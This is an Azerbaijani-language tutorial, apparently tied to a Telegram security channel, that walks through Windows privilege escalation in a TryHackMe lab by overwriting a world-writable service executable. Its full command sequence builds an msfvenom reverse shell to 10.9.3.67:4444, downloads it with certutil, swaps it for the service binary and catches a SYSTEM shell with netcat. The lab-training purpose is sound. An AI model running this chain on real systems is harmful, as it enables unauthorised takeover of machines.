Windows mühitində işləyərkən Servis Faylının Yenidən Yazılması ilə Exploit Edilməsi necə həyata keçirilir?Windows-da Servis Faylının Yenidən Yazılması Exploit Edilməsi ilə PrivEsc necə həyata keçirilir?Servis Faylının Yenidən Yazılması ilə Exploit Edilməsi nədir? Servislərin Exploit Edilməsi nədir? Insecure Service Executables (File Permission)
Telegram kanalına qoşularaq bu və digər mövzular üzrə quizlərdə iştirak edə bilərsiniz!
Telegram (Kanal): https://t.me/xakeraz_official
Servis Faylının Yenidən Yazılması ilə PrivEsc
Əvvəlki paylaşımda bizim servis üzərində “SERVICE_CHANGE_CONFIG” icazəsi ilə servisin konfiqurasiyasını dəyişmək səlahiyyətimiz var idi.İndi isə təsəvvür edinki, bizim belə bir səlahiyyətimiz yoxdur.Amma bizim hədəf servisin icra edən faylını dəyişmək icazəmiz var.Başqa sözlə servisin icra etdiyi faylı dəyişə və ya yenidən yaza bilərik.
C:\Users\user> C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Pr
ogram Files\File Permissions Service"
Accesschk v6.10 - Reports effective permissions for securable objects
Copyright (C) 2006-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
C:\Program Files\File Permissions Service\filepermservice.exe
Medium Mandatory Level (Default) [No-Write-Up]
RW Everyone
FILE_ALL_ACCESS
RW NT AUTHORITY\SYSTEM
FILE_ALL_ACCESS
RW BUILTIN\Administrators
FILE_ALL_ACCESS
İcra etdiyimiz accesschk64.exe -wvu “C:\Program Files\File Permissions Service” əmri ilə bu qovluq altında yerləşən qovluq və faylların icazələrini təyin edirik.Burada görürükki,filepermservice.exe faylının hamı tərəfindən bütün icazələri mövcuddur.
filepermservice.exe faylının servisi haqqında məlumat əldə edək.
C:\Users\user>sc qc filepermsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: filepermsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\File Permissions Service\fileperm
service.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : File Permissions Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\user>sc query filepermsvc
SERVICE_NAME: filepermsvc
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 1077 (0x435)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
Servis haqqında icra etdiyimiz kommandalardan servisin System hesabı ilə icra edildiyini və indiki vəziyyətinin isə deaktiv olduğunu görə bilərik.
Məqam gəldi artıq exploit etməyə,servisin icra faylını dəyişdirməyin mümkün olduğunu bilirik və onu dəyişdirməyə çalışaq.
┌──(root㉿kali)-[~]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.3.67 LPORT=4444 -f exe -o /root/Desktop/shell.exe
python3 -m http.server 80
Msfvenom ilə shell.exe yaradırıq və hədəf ötürmək üçün python ilə http.server aktivləşdiririk.Hədəfdə isə certutil.exe ilə onu yükləyirik.
C:\Users\user\Desktop>certutil.exe -f -split -urlcache http://10.9.3.67/shell.exe
**** Online ****
0000 ...
1c00
CertUtil: -URLCache command completed successfully.
İndi isə əldə etdiyimiz shell.exe faylını servisin icra faylı ilə dəyişirik.
copy /y C:\Users\user\Desktop\shell.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
C:\Users\user\Desktop>copy /y C:\Users\user\Desktop\shell.exe "c:\Program Files
\File Permissions Service\filepermservice.exe"
1 file(s) copied.
Servisi başlatmazdan əvvəl Kali cihazında netcat listener ilə 4444 portunu dinləməyə alaq:
┌──(root㉿kali)-[~]
└─# nc -nvlp 4444
listening on [any] 4444 ...
Yuxarıda servis barədə məlumat əldə edəndə onun deaktiv olduğunu görmüşdük, indi isə onu başladaraq işə salırıq və bizim Kali cihazımıza SYSTEM səlahiyyəti ilə kommanda sətri gələcəkdir.
WINDOWS-------------------------
sc start filepermsvc
KALI ---------------------------
┌──(root㉿kali)-[~]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.9.3.67] from (UNKNOWN) [10.10.171.19] 49242
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Gördüyünüz kimi hədəf servisin yerləşdiyi icra faylının zəif icazələrindən istifadə edərək onu exploit edə bildik və səlahiyyətlərimizi yüksəltdik.
Tapşırıqda istifadə olunan lab: https://tryhackme.com/room/windowsprivescarena 6-cı Task
Ümidvaram faydalı olmuşdur.Təşəkkürlər!
Bizi izləyin:
Telegram (Kanal): https://t.me/xakeraz_official
Paylaşımların səliqəli yığılmış halı: https://t.me/xakerazgroup
Fikir və şərhləriniz : https://t.me/xakerazchat